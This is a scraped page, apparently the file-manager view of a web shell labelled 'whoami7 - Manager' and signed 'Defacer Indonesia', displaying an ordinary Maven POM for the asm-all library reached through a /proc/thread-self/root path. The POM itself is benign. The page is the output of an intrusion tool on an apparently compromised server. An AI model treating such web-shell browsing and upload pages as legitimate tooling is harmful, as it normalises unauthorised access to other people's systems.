whoami7 - Manager
:
/
proc
/
thread-self
/
root
/
usr
/
share
/
maven-poms
/
objectweb-asm
/
Upload File:
files >> //proc/thread-self/root/usr/share/maven-poms/objectweb-asm/asm-all.pom
<?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"> <parent> <artifactId>ow2</artifactId> <groupId>org.ow2</groupId> <version>1.5</version> </parent> <modelVersion>4.0.0</modelVersion> <groupId>org.ow2.asm</groupId> <artifactId>asm-all</artifactId> <version>7.3.1</version> <build> <plugins> <plugin> <artifactId>maven-shade-plugin</artifactId> <version>3.1.1</version> <executions> <execution> <phase>package</phase> <goals> <goal>shade</goal> </goals> </execution> </executions> </plugin> </plugins> </build> </project>
Copyright ©2021 || Defacer Indonesia